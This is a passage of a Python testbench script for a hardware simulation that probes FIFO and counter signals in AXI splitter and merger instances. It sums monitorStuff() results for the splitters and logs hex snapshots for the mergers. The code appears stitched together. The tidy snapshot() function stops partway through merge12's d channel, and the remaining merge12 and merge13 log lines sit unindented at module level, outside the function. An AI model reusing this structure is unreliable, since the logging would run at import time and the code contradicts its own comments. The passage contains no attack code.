counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.w_fifo.count")
veri.force('tb.Panics',str(panics))
def snapshot():
    # Log one "SNP <hex value> <path>" line per probed counter.
    def snap(path):
        logs.log_info("SNP %x %s" % (logs.peek(path), path))

    # All counters of one 4-way AXI read merger instance.
    def snap_rd_merger(inst):
        rd = "tb.dut.%s.axi_rd_4_merger." % inst
        for ch in "abcd":
            snap(rd + ch + "_rcount")
        for ch in "abcd":
            snap(rd + ch + "_ar_fifo.count")
            snap(rd + ch + "_ar_fifo.int_count")
            snap(rd + ch + "_ids_fifo.next_count")
            snap(rd + ch + "_ids_fifo.count")

    # Per-channel FIFO counters of a 4-way AXI write merger.
    # Only channel b has an out_fifo, so it is probed for that channel alone.
    def snap_wr_channel(wr, ch):
        snap(wr + ch + "_aw_fifo.count")
        snap(wr + ch + "_aw_fifo.int_count")
        snap(wr + ch + "_b_fifo.next_count")
        snap(wr + ch + "_b_fifo.count")
        if ch == "b":
            snap(wr + "b_out_fifo.next_count")
            snap(wr + "b_out_fifo.count")
        snap(wr + ch + "_win_fifo.count")
        snap(wr + ch + "_win_fifo.int_count")

    # All counters of one 4-way AXI write merger instance.
    def snap_wr_merger(inst):
        wr = "tb.dut.%s.axi_wr_4_merger." % inst
        for ch in "abcd":
            snap(wr + "panic_" + ch + "count")
        for ch in "abcd":
            snap(wr + ch + "_bcount")
        for ch in "abcd":
            snap_wr_channel(wr, ch)

    for inst in ("merge0", "merge1", "merge10", "merge11"):
        snap_rd_merger(inst)
        snap_wr_merger(inst)

    # merge12: read merger, panic/bcount counters, and write channels a-c;
    # the d channel is only probed up to its b_fifo.next_count here.
    snap_rd_merger("merge12")
    wr12 = "tb.dut.merge12.axi_wr_4_merger."
    for ch in "abcd":
        snap(wr12 + "panic_" + ch + "count")
    for ch in "abcd":
        snap(wr12 + ch + "_bcount")
    for ch in "abc":
        snap_wr_channel(wr12, ch)
    snap(wr12 + "d_aw_fifo.count")
    snap(wr12 + "d_aw_fifo.int_count")
    snap(wr12 + "d_b_fifo.next_count")
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_win_fifo.count"))
